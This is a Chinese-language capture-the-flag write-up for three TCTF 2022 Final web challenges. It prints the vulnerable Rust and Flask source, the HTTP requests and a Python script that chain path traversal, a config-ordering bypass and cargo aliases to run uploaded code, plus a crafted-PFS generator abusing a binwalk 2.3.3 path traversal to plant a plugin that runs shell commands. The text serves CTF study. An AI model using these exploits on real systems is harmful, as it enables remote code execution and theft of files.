TCTF 2022 Final Web Writeup

TCTF 2022 Final (RisingStar) Web Writeup

cargo

一道 rust 题

虽然之前断断续续看过一段时间的 course.rs, 不过后面由于各种原因就没有继续学习, 有点可惜 (

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#[macro_use]
extern crate rocket;

use crate::rocket::data::ToByteUnit;
use rand::distributions::Alphanumeric;
use rand::Rng;
use rocket::Data;
use std::collections::HashMap;
use std::fs;
use std::io;
use std::path::Path;
use std::process::Command;

fn gen_id(length: usize) -> String {
    let mut rng = rand::thread_rng();
    let chars = std::iter::repeat(())
        .map(|()| rng.sample(Alphanumeric))
        .filter(|c| (c.is_ascii_hexdigit()))
        .take(length)
        .collect();
    String::from_utf8(chars).unwrap_or_default()
}

#[post("/upload/<id>", data = "<data>")]
async fn upload(id: String, data: Data<'_>) -> io::Result<String> {
    if !id.contains("user") {
        return Ok("Done".to_string());
    }
    let path = Path::new("upload").join(id).join("src").join("main.rs");
    data.open(8_u32.kibibytes()).into_file(path).await?;
    Ok("Done".to_string())
}

#[get("/config/<conf>")]
fn config(conf: String) -> io::Result<String> {
    let filtered: String = conf
        .chars()
        .filter(|c| c.is_alphanumeric() || *c==' ' || *c==',')
        .collect();
    let mut added = String::from("");
    let parts: Vec<&str> = filtered.split(',').collect();
    for part in parts {
        if added.is_empty() {
            added += part;
            added += ":\n";
        } else {
            added += "  - ";
            added += part;
            added += "\n";
        }
    }
    added += "  - goto user\n";
    let old = fs::read_to_string("config.yml")?;
    let new = format!("{}{}", added, old);
    fs::write("config.yml", new)?;
    Ok("Done".to_string())
}

#[get("/cargo/<id>/<cmd>")]
fn command(cmd: String, id: String) -> Option<String> {
    let c = fs::read_to_string("config.yml").ok()?;
    let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).ok()?;
    let mut ok = true;
    let mut target = id.clone();
    for (k, v) in config {
        if target.contains(&k) {
            for keyword in v {
                if cmd.contains(&keyword) {
                    ok = false;
                }
                if keyword.starts_with("goto ") {
                    target = keyword.to_string().get(5..).unwrap_or("").to_string();
                }
            }
        }
    }
    if !ok {
        return Some("redacted".to_string());
    }
    let output = Command::new("cargo")
        .arg(&cmd)
        .current_dir(Path::new("upload").join(id))
        .output()
        .ok()?;
    Some(format!("{}", String::from_utf8_lossy(&output.stdout)))
}

#[get("/new")]
fn new() -> io::Result<String> {
    let user_id = format!("user{}", gen_id(16));
    Command::new("cargo")
        .arg("init")
        .arg(&user_id)
        .current_dir(Path::new("upload"))
        .output()?;
    Ok(user_id.to_string())
}

#[get("/reset")]
fn reset() -> io::Result<String> {
    Command::new("rm").arg("-rf").arg("upload").output()?;
    Command::new("mkdir").arg("-p").arg("upload").output()?;
    for test in &["test1", "test2", "test3"] {
        Command::new("cargo")
        .arg("init")
        .arg(test)
        .current_dir(Path::new("upload"))
        .output()?;
    }
    let admin_id = gen_id(16);
    fs::write("config.yml", format!("{}:\n\nuser:\n  - bench\n  - check\n  - doc\n  - fetch\n  - fix\n  - run\n  - rustc\n  - rustdoc\n  - test\n  - report\ntest:\n  - bench\n  - run\n  - test\n", admin_id))?;
    Ok("Done".to_string())
}

#[get("/")]
fn index() -> &'static str {
    "This is Index"
}

#[launch]
fn rocket() -> _ {
    rocket::build().mount("/", routes![index, reset, new, command, config, upload])
}

Cargo.toml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
[package]
name = "task1"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
rocket = "0.5.0"
serde = { version = "1.0.189", features = ["derive"] }
serde_yaml = "0.9.25"
rand = "0.8.5"

config.yaml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
RAND_STR:

user:
  - bench
  - check
  - doc
  - fetch
  - fix
  - run
  - rustc
  - rustdoc
  - test
  - report
test:
  - bench
  - run
  - test

网站可以创建 user, 上传 rust 代码, 并调用 cargo 系列命令

config.yaml 以 user 和 test 开头的用户 ban 了能够执行代码的子命令 (run bench test)

/new 路由创建用户, 用户名的规则为 user + 随机字符串

/config 路由自定义被 ban 的子命令, 然后将配置写入 config.yml 的开头, 配置结尾会加入 go to user 表示跳转到 user 那部分的配置

/upload 路由上传代码, 保存为 main.rs, 可以目录穿越

/cargo 路由调用 cargo 子命令, 会读取 config.yaml 里面的配置并进行过滤, 最后会将运行的输出作为结果回显

这里是个非预期, cargo rcargo run 的别名 (alias), 所以直接就能 RCE

payload

reset

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
GET /reset HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

new

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
GET /new HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

upload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST /upload/userC0bd33e7218b9Dc7 HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 473

use std::fs;

fn main() {
    let file_content = fs::read_to_string("/etc/passwd")
        .expect("Failed to read file");
    
    println!("File content:\n{}", file_content);
}

cargo r

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
GET /cargo/userC0bd33e7218b9Dc7/r HTTP/1.1
Host: 127.0.0.1:8000
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
sec-ch-ua-platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

cargo2

cargo2 修复了 cargo 的非预期

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
#[macro_use]
extern crate rocket;

use crate::rocket::data::ToByteUnit;
use rand::distributions::Alphanumeric;
use rand::Rng;
use rocket::Data;
use std::collections::HashMap;
use std::fs;
use std::io;
use std::path::Path;
use std::process::Command;

fn gen_id(length: usize) -> String {
    let mut rng = rand::thread_rng();
    let chars = std::iter::repeat(())
        .map(|()| rng.sample(Alphanumeric))
        .filter(|c| (c.is_ascii_hexdigit()))
        .take(length)
        .collect();
    String::from_utf8(chars).unwrap_or_default()
}

#[post("/upload/<id>", data = "<data>")]
async fn upload(id: String, data: Data<'_>) -> io::Result<String> {
    if !id.contains("user") {
        return Ok("Done".to_string());
    }
    let path = Path::new("upload").join(id).join("src").join("main.rs");
    data.open(8_u32.kibibytes()).into_file(path).await?;
    Ok("Done".to_string())
}

#[get("/config/<conf>")]
fn config(conf: String) -> io::Result<String> {
    let filtered: String = conf
        .chars()
        .filter(|c| c.is_ascii_alphanumeric() || *c == ' ' || *c == ',')
        .collect();
    let mut added = String::from("");
    let parts: Vec<&str> = filtered.split(',').collect();
    for part in parts {
        if added.is_empty() {
            if part == "user" || part == "test" {
                return Ok("Failed".to_string());
            }
            added += part;
            added += ":\n";
        } else {
            added += "  - ";
            added += part;
            added += "\n";
        }
    }
    added += "  - goto user\n";
    let old = fs::read_to_string("config.yml")?;
    let new = format!("{}{}", added, old);
    fs::write("config.yml", new)?;
    Ok("Done".to_string())
}

#[get("/cargo/<id>/<cmd>")]
fn command(cmd: String, id: String) -> Option<String> {
    if id.chars().any(|c| !c.is_ascii_alphanumeric()) {
        return Some("redacted".to_string());
    }
    let c = fs::read_to_string("config.yml").ok()?;
    let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).ok()?;
    let mut ok = true;
    let mut target = id.clone();
    for (k, v) in config {
        if target.contains(&k) {
            for keyword in v {
                if cmd.contains(&keyword) {
                    ok = false;
                }
                if keyword.starts_with("goto ") {
                    target = keyword.to_string().get(5..).unwrap_or("").to_string();
                }
            }
        }
    }
    if !ok {
        return Some("redacted".to_string());
    }
    let output = Command::new("cargo")
        .arg(&cmd)
        .current_dir(Path::new("upload").join(id))
        .output()
        .ok()?;
    Some(format!("{}", String::from_utf8_lossy(&output.stdout)))
}

#[get("/new")]
fn new() -> io::Result<String> {
    let user_id = format!("user{}", gen_id(16));
    Command::new("cargo")
        .arg("init")
        .arg(&user_id)
        .current_dir(Path::new("upload"))
        .output()?;
    Ok(user_id.to_string())
}

#[get("/reset")]
fn reset() -> io::Result<String> {
    Command::new("rm").arg("-rf").arg("upload").output()?;
    Command::new("mkdir").arg("-p").arg("upload").output()?;
    for test in &["test1", "test2", "test3"] {
        Command::new("cargo")
            .arg("init")
            .arg(test)
            .current_dir(Path::new("upload"))
            .output()?;
    }
    let admin_id = gen_id(16);
    fs::write("config.yml", format!("{}:\n\nuser:\n  - bench\n  - c\n  - check\n  - d\n  - doc\n  - fetch\n  - fix\n  - r\n  - run\n  - rustc\n  - rustdoc\n  - t\n  - test\n  - report\ntest:\n  - bench\n  - r\n  - run\n  - t\n  - test\n", admin_id))?;
    Ok("Done".to_string())
}

#[get("/")]
fn index() -> &'static str {
    "This is Index"
}

#[launch]
fn rocket() -> _ {
    rocket::build().mount("/", routes![index, reset, new, command, config, upload])
}

这里直接说思路

仔细看 /cargo 路由的话会发现它的解析过程是存在问题的

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#[get("/cargo/<id>/<cmd>")]
fn command(cmd: String, id: String) -> Option<String> {
    if id.chars().any(|c| !c.is_ascii_alphanumeric()) {
        return Some("redacted".to_string());
    }
    let c = fs::read_to_string("config.yml").ok()?;
    let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).ok()?;
    let mut ok = true;
    let mut target = id.clone();
    for (k, v) in config {
        if target.contains(&k) {
            for keyword in v {
                if cmd.contains(&keyword) {
                    ok = false;
                }
                if keyword.starts_with("goto ") {
                    target = keyword.to_string().get(5..).unwrap_or("").to_string();
                }
            }
        }
    }
    if !ok {
        return Some("redacted".to_string());
    }
    let output = Command::new("cargo")
        .arg(&cmd)
        .current_dir(Path::new("upload").join(id))
        .output()
        .ok()?;
    Some(format!("{}", String::from_utf8_lossy(&output.stdout)))
}

yaml 反序列化的结果会存入 HashMap, 而众所周知 HashMap key 的顺序是不确定的, 与之相反的是 TreeMap

简单写个代码

1
2
3
4
5
6
7
8
9
use std::{fs, collections::HashMap};

fn main() {
    let c = fs::read_to_string("config.yaml").expect("err");
    let config: HashMap<String, Vec<String>> = serde_yaml::from_str(&c).expect("err");
    for (k, _) in config {
        println!("{}", k);
    }
}

config.yaml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
test1:
  - a
  - goto user

C8ecB8d1F7E02B3f:

user:
  - bench
  - c
  - check
  - d
  - doc
  - fetch
  - fix
  - r
  - run
  - rustc
  - rustdoc
  - t
  - test
  - report
test:
  - bench
  - r
  - run
  - t
  - test

运行多次后会发现 test1 C8ecB8d1F7E02B3f user test 这四个 key 的顺序每次都有概率会不一样

然后结合题目的代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
for (k, v) in config {
    if target.contains(&k) {
        for keyword in v {
            if cmd.contains(&keyword) {
                ok = false;
            }
            if keyword.starts_with("goto ") {
                target = keyword.to_string().get(5..).unwrap_or("").to_string();
            }
        }
    }
}
if !ok {
    return Some("redacted".to_string());
}

当 keyword 以 goto 开头时, 就会把当前的 target 改成 goto 后面的值, 也就是 user, 然后等到下一次循环的时候匹配 user 下的规则

那么只需要保证遍历 config 时, user 的顺序出现在我们自定义的用户 test1 前面就行 (也不一定是 test1, 通过 /new 路由创建的 userXXX 用户理论上也行)

以 test1 为例, 只需要保证顺序为: user > test1 > test 即可同时绕过 user 和 test 规则的检测

首先通过目录穿越将代码上传至 test1 用户的目录, 然后创建 test1 的 config, 最后访问 cargo run, 多打几次就能拿到 flag 了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests

url = 'http://4cckcq86xq36xrrj.instance.tctf.pwnable.cn:18080'

requests.get(url + '/reset')
user_id = requests.get(url + '/new').text

payload = '''
use std::fs;

fn main() {
    let file_content = fs::read_to_string("/tmp/flag")
        .expect("Failed to read file");
    
    println!("File content:\n{}", file_content);
}'''

requests.get(url + '/config/test1,fake')
requests.post(url + '/upload/{}%2f..%2ftest1%2f'.format(user_id), data=payload)

'''
前后顺序必须为 user > test1 > test
user
C8ecB8d1F7E02B3f
test1
test
'''

while True:
    flag = input()
    if flag == 'EOF':
        break
    res = requests.get(url + '/cargo/test1/run')
    print(res.text)

smartbinary

app.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
import hashlib
import json
import os
import subprocess
from typing import Any

from flask import Flask, render_template, request

def run_cmd(cmd: str) -> str:
    r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding="utf8")
    out = r.stdout
    return out


class Analyzer:
    def __init__(self) -> None:
        self.name = ""
    def analyze(self, filename: str) -> str:
        return ""


class FileAnalyzer(Analyzer):
    def __init__(self) -> None:
        self.name = "file"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"file {filename}")


class StringsAnalyzer:
    def __init__(self) -> None:
        self.name = "string"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"strings {filename}")

class UnzipAnalyzer:
    def __init__(self) -> None:
        self.name = "upzip"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"unzip -z {filename}")

class BinwalkAnalyzer:
    def __init__(self) -> None:
        self.name = "binwalk"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"binwalk -Me {filename}")

class UpxAnalyzer:
    def __init__(self) -> None:
        self.name = "upx"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"upx -t {filename}")

class ReadelfAnalyzer:
    def __init__(self) -> None:
        self.name = "readelf"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"readelf -h {filename}")

class ChecksecAnalyzer:
    def __init__(self) -> None:
        self.name = "checksec"
    def analyze(self, filename: str) -> str:
        return run_cmd(f"checksec {filename}")


analyzers = [FileAnalyzer(), StringsAnalyzer(), UnzipAnalyzer(), BinwalkAnalyzer(), UpxAnalyzer(), ReadelfAnalyzer(), ChecksecAnalyzer()]

def do_analyze(filename: str) -> dict[str, str]:
    r: dict[str, str] = {}
    for ana in analyzers:
        name = ana.name
        value = ana.analyze(filename)
        r[name] = value
    return r


def checkfilename(s: str) -> bool:
    if not s:
        return False
    return all(c in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" for c in s)


app = Flask(__name__)

app.config['UPLOAD_FOLDER'] = "/tmp"
app.config['MAX_CONTENT_PATH'] = 1*1024*1024

@app.route("/")
def index() -> Any:
    file_list_file = f"/tmp/smartbinary/filelist.txt"
    with open(file_list_file, "r") as f:
        filesha256s = f.read().split()
    r = ""
    r += "<p>welcome to smartbinary platform! it can analyze your file smartly.</p><p></p>"
    r += '''<form action="/upload" method="post" enctype="multipart/form-data">
    <label>upload a file</label>
    <input type="file" name="file"></input>
    <input type="submit">submit</input>
    </form>
    '''
    r += "<br><br>"
    for filesha256 in filesha256s:
        r += f'<a href="/analyze?filesha256={filesha256}">do analyze on file {filesha256}</a><br>'
        r += f'<a href="/file/{filesha256}">analyze result of  {filesha256}</a><br>'
    return r

@app.route("/upload", methods=["POST"])
def upload() -> Any:
    f = request.files['file']
    f.save("/tmp/smartbinary_tmpfile")
    with open("/tmp/smartbinary_tmpfile", "rb") as f:
        content = f.read()
    os.unlink(app.config['UPLOAD_FOLDER']+"/smartbinary_tmpfile")
    filesha256 = hashlib.sha256(content).hexdigest()
    file_dir = f"/tmp/smartbinary/{filesha256}"
    file_path = f"{file_dir}/file"
    if os.path.exists(file_path):
        return "<p>file already uploaded</p>"
    try:
        os.makedirs(file_dir)
    except FileExistsError:
        pass
    with open(file_path, "wb") as f:
        f.write(content)
    with open("/tmp/smartbinary/filelist.txt", "r") as f:
        filelist = f.read().split()
    filelist.append(filesha256)
    with open("/tmp/smartbinary/filelist.txt", "w") as f:
        for s in filelist:
            f.write(s + "\n")
    return "<p>upload successfully</p>"


@app.route("/analyze")
def analyze() -> Any:
    filesha256 = request.args.get("filesha256")
    if not checkfilename(filesha256):
        return "<p>error</p>"
    file_dir = f"/tmp/smartbinary/{filesha256}"
    status_file_path = f"{file_dir}/status"
    file_path = f"{file_dir}/file"
    result_path = f"{file_dir}/result.json"
    if os.path.exists(status_file_path):
        return "<p>file already analyzed</p>"
    if not os.path.exists(file_path):
        return "<p>file not uploaded</p>"
    try:
        os.makedirs(file_dir)
    except FileExistsError:
        pass
    with open(status_file_path, "w") as f:
        f.write("RUNNING")
    result = do_analyze(file_path)
    with open(result_path, "w") as f:
        json.dump(result, f)
    with open(status_file_path, "w") as f:
        f.write("FINISHED")
    return "<p>analyze finish</p>"


@app.route("/file/<filesha256>")
def file(filesha256) -> Any:
    if not checkfilename(filesha256):
        return "<p>error</p>"
    file_dir = f"/tmp/smartbinary/{filesha256}"
    status_file_path = f"{file_dir}/status"
    result_path = f"{file_dir}/result.json"
    if not os.path.exists(status_file_path):
        return "<p>no such file</p>"
    with open(status_file_path, "r") as f:
        status = f.read().strip()
    result: Any = ""
    if status == "FINISHED":
        with open(result_path, "rb") as f:
            result = json.load(f)
    r = f"<p>status: {status}</p><br><code>{result}</code>"
    return r


try:
    os.makedirs("/tmp/smartbinary")
except FileExistsError:
    pass
if not os.path.exists("/tmp/smartbinary/filelist.txt"):
    with open("/tmp/smartbinary/filelist.txt", "w") as f:
        f.write("")

if __name__ == "__main__":
    # run_cmd("ls / /a")
    app.run(host="0.0.0.0", port=5000, debug=False)

直接给出思路: binwalk 2.3.3 版本存在目录穿越可导致 RCE

https://blog.csdn.net/leiwuhen92/article/details/131509099

https://github.com/Kalagious/BadPfs

https://github.com/ReFirmLabs/binwalk/pull/617

参考 BadPfs

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import argparse

out = 'payload.pfs'
data = 'binwalk.py'


header = b'\x50\x46\x53\x2F\x30\x2E\x39\x0A\x00\x00\x00\x00\x00\x00\x01\x00'

badPfs = open(out,'wb')
badPfs.write(header)
targetFile = "../../../.config/binwalk/plugins/binwalk.py"

if len(targetFile) > 60:
	print("Write filename too long")
	exit()

badPfs.write(targetFile.encode())
for i in range(60-len(targetFile)):
	badPfs.write(b'\x00')

badPfs.write(b'\x01'*4)
badPfs.write(b'\x00'*4)

data = open(data, 'rb').read()
badPfs.write(b'\x01'*4)
badPfs.write(len(data).to_bytes(4, 'little'))	
badPfs.write(data)

binwalk.py

1
2
3
4
5
import binwalk.core.plugin
import os
class MaliciousExtractor(binwalk.core.plugin.Plugin):
    def init(self):
        os.system('cp /flag.txt /tmp/smartbinary/a9b1812*/status')

先正常传一个文件, 记下 sha256 开头 (因为 plugin 内容不能太长), 将 flag.txt 复制到该目录下的 status 文件

然后运行脚本构造 pfs 并用 zip 压缩, 上传, 分析

最后访问第一个文件的 analyze result 得到 flag

注意生成 pfs 后可能需要参考文章里的方法删除 pfs 内的空字符

0%